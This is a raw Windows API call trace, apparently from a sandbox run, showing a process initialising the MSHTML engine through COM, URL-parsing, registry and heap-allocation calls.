[0080.101] IUri:GetPropertyDWORD (in: This=0x13baac, uriProp=0x11, pdwProperty=0x39eb64, dwFlags=0x0 | out: pdwProperty=0x39eb64*=0x11) returned 0x0
[0080.101] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x1421c4, dwReserved=0x0 | out: ppSM=0x1421c4*=0x143a40) returned 0x0
[0080.102] IInternetSecurityManager:SetSecuritySite (This=0x143a40, pSite=0x1421cc) returned 0x0
[0080.102] IUnknown:AddRef (This=0x1421cc) returned 0x28
[0080.102] IUnknown:QueryInterface (in: This=0x1421cc, riid=0x75a961d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x39eb34 | out: ppvObject=0x39eb34*=0x1421d0) returned 0x0
[0080.102] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x143a68 | out: ppvObject=0x143a68*=0x0) returned 0x80004002
[0080.102] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x143a64 | out: ppvObject=0x143a64*=0x0) returned 0x80004002
[0080.102] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x143a60 | out: ppvObject=0x143a60*=0x0) returned 0x80004002
[0080.102] IUnknown:Release (This=0x1421d0) returned 0x0
[0080.102] IInternetSecurityManager:GetSecurityId (in: This=0x143a40, pwszUrl="about:blank", pbSecurityId=0x39ebd0, pcbSecurityId=0x39ebc4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x39ebd0*=0x61, pcbSecurityId=0x39ebc4*=0xf) returned 0x0
[0080.132] DllGetClassObject (in: rclsid=0x13f990*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x39e150*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39d808 | out: ppv=0x39d808*=0x73da8c70) returned 0x0
[0080.132] IUnknown:AddRef (This=0x73da8c70) returned 0x1
[0080.132] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.132] IUnknown:QueryInterface (in: This=0x73da8c70, riid=0x75a84430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e3cc | out: ppvObject=0x39e3cc*=0x73da8c70) returned 0x0
[0080.132] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.133] IUnknown:QueryInterface (in: This=0x73da8c70, riid=0x75aaaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39e58c | out: ppvObject=0x39e58c*=0x73da8c7c) returned 0x0
[0080.133] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.133] IInternetProtocolInfo:ParseUrl (in: This=0x73da8c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1338d8, cchResult=0xc, pcchResult=0x39e5d4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x39e5d4*=0xc) returned 0x0
[0080.133] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x1448c8
[0080.133] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.133] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1448c8 | out: hHeap=0x110000) returned 1
[0080.133] IUnknown:Release (This=0x73da8c7c) returned 0x1
[0080.133] DllGetClassObject (in: rclsid=0x13f990*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75a84430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39e4a0 | out: ppv=0x39e4a0*=0x73da8c70) returned 0x0
[0080.134] IUnknown:QueryInterface (in: This=0x73da8c70, riid=0x75aaaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39e58c | out: ppvObject=0x39e58c*=0x73da8c7c) returned 0x0
[0080.134] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.134] IInternetProtocolInfo:ParseUrl (in: This=0x73da8c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1338d8, cchResult=0xc, pcchResult=0x39e5e4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x39e5e4*=0x0) returned 0x800c0011
[0080.134] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.134] IUnknown:Release (This=0x73da8c7c) returned 0x1
[0080.134] IUnknown:Release (This=0x13baac) returned 0x2
[0080.134] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.134] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xf) returned 0x13e0e8
[0080.134] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e130
[0080.135] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x39eba4, dwReserved=0x0 | out: ppSM=0x39eba4*=0x149038) returned 0x0
[0080.135] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xf) returned 0x13e148
[0080.135] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x148f80
[0080.135] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39ed54 | out: phkResult=0x39ed54*=0x19c) returned 0x0
[0080.136] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39ed58 | out: phkResult=0x39ed58*=0x1a8) returned 0x0
[0080.136] RegOpenKeyExW (in: hKey=0x1a8, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x39ed14 | out: phkResult=0x39ed14*=0x0) returned 0x2
[0080.136] RegOpenKeyExW (in: hKey=0x19c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x39ed14 | out: phkResult=0x39ed14*=0x0) returned 0x2
[0080.136] RegCloseKey (hKey=0x0) returned 0x6
[0080.136] RegCloseKey (hKey=0x0) returned 0x6
[0080.136] RegCloseKey (hKey=0x19c) returned 0x0
[0080.136] RegCloseKey (hKey=0x1a8) returned 0x0
[0080.136] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x128) returned 0x149688
[0080.136] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x1490a0
[0080.136] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e178
[0080.136] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x2000) returned 0x1497b8
[0080.137] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x1490f8
[0080.137] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1490f8 | out: hHeap=0x110000) returned 1
[0080.137] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.137] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x39eb98 | out: ppURI=0x39eb98*=0x13baac) returned 0x0
[0080.138] DllGetClassObject (in: rclsid=0x13f990*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75a84430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39e470 | out: ppv=0x39e470*=0x73da8c70) returned 0x0
[0080.138] IUnknown:QueryInterface (in: This=0x73da8c70, riid=0x75aaaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39e55c | out: ppvObject=0x39e55c*=0x73da8c7c) returned 0x0
[0080.138] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.138] IInternetProtocolInfo:ParseUrl (in: This=0x73da8c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1338d8, cchResult=0xc, pcchResult=0x39e5a4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x39e5a4*=0xc) returned 0x0
[0080.139] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x1448c8
[0080.139] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.139] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1448c8 | out: hHeap=0x110000) returned 1
[0080.139] IUnknown:Release (This=0x73da8c7c) returned 0x1
[0080.139] DllGetClassObject (in: rclsid=0x13f990*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75a84430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39e470 | out: ppv=0x39e470*=0x73da8c70) returned 0x0
[0080.139] IUnknown:QueryInterface (in: This=0x73da8c70, riid=0x75aaaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x39e55c | out: ppvObject=0x39e55c*=0x73da8c7c) returned 0x0
[0080.139] IUnknown:Release (This=0x73da8c70) returned 0x1
[0080.139] IInternetProtocolInfo:ParseUrl (in: This=0x73da8c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1338d8, cchResult=0xc, pcchResult=0x39e5b4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x39e5b4*=0x0) returned 0x800c0011
[0080.139] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.139] IUnknown:Release (This=0x73da8c7c) returned 0x1
[0080.140] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0080.140] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0080.140] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0080.141] IUnknown:Release (This=0x13baac) returned 0x2
[0080.141] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x2c) returned 0x12d7b8
[0080.141] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x1248d0
[0080.141] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x5c) returned 0x1490f8
[0080.141] GetDC (hWnd=0x0) returned 0x2a010b9a
[0080.141] GetDeviceCaps (hdc=0x2a010b9a, index=88) returned 96
[0080.141] ReleaseDC (hWnd=0x0, hDC=0x2a010b9a) returned 1
[0080.141] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000
[0080.142] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39edf0 | out: phkResult=0x39edf0*=0x128) returned 0x0
[0080.142] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39edf4 | out: phkResult=0x39edf4*=0x19c) returned 0x0
[0080.142] RegOpenKeyExW (in: hKey=0x19c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x39edb0 | out: phkResult=0x39edb0*=0x0) returned 0x2
[0080.143] RegOpenKeyExW (in: hKey=0x128, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x39edb0 | out: phkResult=0x39edb0*=0x0) returned 0x2
[0080.143] RegCloseKey (hKey=0x0) returned 0x6
[0080.143] RegCloseKey (hKey=0x0) returned 0x6
[0080.143] RegCloseKey (hKey=0x128) returned 0x0
[0080.143] RegCloseKey (hKey=0x19c) returned 0x0
[0080.143] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x124a98
[0080.143] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x44) returned 0x129428
[0080.143] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x5c) returned 0x14b7c0
[0080.143] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000
[0080.144] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSRWLock") returned 0x77a18456
[0080.144] GetProcAddress (hModule=0x769b0000, lpProcName="AcquireSRWLockExclusive") returned 0x77a129f1
[0080.144] GetProcAddress (hModule=0x769b0000, lpProcName="AcquireSRWLockShared") returned 0x77a12560
[0080.144] GetProcAddress (hModule=0x769b0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77a129ab
[0080.144] GetProcAddress (hModule=0x769b0000, lpProcName="ReleaseSRWLockShared") returned 0x77a125a9
[0080.144] RtlInitializeConditionVariable () returned 0x14b7f4
[0080.144] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x34) returned 0x149160
[0080.144] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x34) returned 0x1440e0
[0080.144] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x1338d8
[0080.145] IUnknown:Release (This=0x73da8cb0) returned 0x1
[0080.150] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x12d108
[0080.151] IUnknown_QueryService (in: punk=0x73da96a4, guidService=0x73a3880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x73a3880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x141ae8 | out: ppvOut=0x141ae8*=0x0) returned 0x80004005
[0080.151] IUnknown:QueryInterface (in: This=0x73da96a4, riid=0x771e42d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x39fb38 | out: ppvObject=0x39fb38*=0x73da96b8) returned 0x0
[0080.151] IServiceProvider:QueryService (in: This=0x73da96b8, guidService=0x73a3880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x73a3880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x141ae8 | out: ppvObject=0x141ae8*=0x0) returned 0x80004005
[0080.151] IUnknown:Release (This=0x73da96b8) returned 0x1
[0080.151] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x34) returned 0x14b828
[0080.151] IInternetSecurityManager:SetSecuritySite (This=0x143a40, pSite=0x1421cc) returned 0x0
[0080.151] IUnknown:Release (This=0x1421cc) returned 0x0
[0080.151] IUnknown:AddRef (This=0x1421cc) returned 0x28
[0080.151] IUnknown:QueryInterface (in: This=0x1421cc, riid=0x75a961d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x39fb70 | out: ppvObject=0x39fb70*=0x1421d0) returned 0x0
[0080.151] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x143a68 | out: ppvObject=0x143a68*=0x0) returned 0x80004002
[0080.151] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x143a64 | out: ppvObject=0x143a64*=0x0) returned 0x80004002
[0080.151] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x143a60 | out: ppvObject=0x143a60*=0x73da96bc) returned 0x0
[0080.152] IUnknown:Release (This=0x1421d0) returned 0x0
[0080.152] CoTaskMemAlloc (cb=0x6d) returned 0x14b868
[0080.152] CoTaskMemAlloc (cb=0x9) returned 0x124858
[0080.152] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x13e1a8
[0080.152] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14b8e0
[0080.152] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0080.152] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x44) returned 0x129478
[0080.152] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x13e1c0
[0080.152] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e1d8
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4) returned 0x13b938
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x20) returned 0x144940
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x13e1f0
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x94) returned 0x14b938
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x34) returned 0x14b9d8
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x70) returned 0x14ba18
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xf8) returned 0x14ba90
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8b4) returned 0x14bb90
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e208
[0080.153] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e220
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x84) returned 0x14c450
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x14c4e0
[0080.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x14cce8
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4c) returned 0x14d4f0
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x14d548
[0080.154] IsCharSpaceW (wch=0x48) returned 0
[0080.154] IsCharAlphaNumericW (ch=0x5c) returned 0
[0080.154] IsCharSpaceW (wch=0x5c) returned 0
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x18) returned 0x1338f8
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14dd68
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x133918
[0080.154] IsCharSpaceW (wch=0x41) returned 0
[0080.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x13e238
[0080.154] IsCharAlphaNumericW (ch=0x20) returned 0
[0080.154] IsCharSpaceW (wch=0x20) returned 1
[0080.154] IsCharSpaceW (wch=0x7b) returned 0
[0080.155] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x144968
[0080.155] IsCharSpaceW (wch=0x20) returned 1
[0080.155] IsCharAlphaNumericW (ch=0x7b) returned 0
[0080.155] IsCharSpaceW (wch=0x62) returned 0
[0080.155] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14dd68 | out: hHeap=0x110000) returned 1
[0080.155] IsCharAlphaNumericW (ch=0x3a) returned 0
[0080.155] IsCharSpaceW (wch=0x3a) returned 0
[0080.155] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x144990
[0080.157] IsCharAlphaNumericW (ch=0x3a) returned 0
[0080.157] IsCharSpaceW (wch=0x75) returned 0
[0080.157] IsCharAlphaNumericW (ch=0x28) returned 0
[0080.157] IsCharSpaceW (wch=0x28) returned 0
[0080.157] IsCharAlphaNumericW (ch=0x28) returned 0
[0080.157] IsCharSpaceW (wch=0x23) returned 0
[0080.157] IsCharSpaceW (wch=0x23) returned 0
[0080.157] IsCharSpaceW (wch=0x7d) returned 0
[0080.157] IsCharAlphaNumericW (ch=0x7d) returned 0
[0080.157] IsCharSpaceW (wch=0x29) returned 0
[0080.157] IsCharSpaceW (wch=0x75) returned 0
[0080.157] IsCharSpaceW (wch=0x75) returned 0
[0080.157] IsCharSpaceW (wch=0x29) returned 0
[0080.157] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x133958
[0080.157] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x34) returned 0x14ef58
[0080.157] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x124110
[0080.157] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e250
[0080.158] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e268
[0080.158] CoTaskMemFree (pv=0x14b868)
[0080.158] CoTaskMemFree (pv=0x124858)
[0080.158] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x133978
[0080.158] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x757f0000
[0080.158] GetProcAddress (hModule=0x757f0000, lpProcName=0x6) returned 0x757f3e59
[0080.158] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0080.158] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x340) returned 0x14ef98
[0080.159] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4a) returned 0x14dd68
[0080.159] IsOS (dwOS=0x25) returned 1
[0080.159] GetSysColor (nIndex=26) returned 0xcc6600
[0080.159] IsOS (dwOS=0x25) returned 1
[0080.159] GetSysColor (nIndex=5) returned 0xffffff
[0080.159] GetSysColor (nIndex=8) returned 0x0
[0080.159] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.159] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x124858
[0080.186] wcstol (in: _String="0,0,255", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*=",0,255") returned 0
[0080.186] wcstol (in: _String="0,255", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*=",255") returned 0
[0080.186] wcstol (in: _String="255", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*="") returned 255
[0080.186] wcstol (in: _String="128,0,128", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*=",0,128") returned 128
[0080.186] wcstol (in: _String="0,128", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*=",128") returned 0
[0080.186] wcstol (in: _String="128", _EndPtr=0x39e7cc, _Radix=10 | out: _EndPtr=0x39e7cc*="") returned 128
[0080.189] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0
[0080.189] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0
[0080.189] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f884 | out: phkResult=0x39f884*=0xb8) returned 0x0
[0080.190] SHGetValueW (in: hkey=0xb8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x39f888, pcbData=0x39f880*=0xa | out: pdwType=0x0, pvData=0x39f888, pcbData=0x39f880*=0xa) returned 0x2
[0080.190] RegCloseKey (hKey=0xb8) returned 0x0
[0080.191] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x80) returned 0x1502e0
[0080.191] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x124ab0
[0080.191] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x3a) returned 0x1241a0
[0080.191] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x9a) returned 0x150768
[0080.194] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13e280
[0080.194] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x26) returned 0x12d138
[0080.194] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x9e) returned 0x150810
[0080.194] GetProcessHeap () returned 0x110000
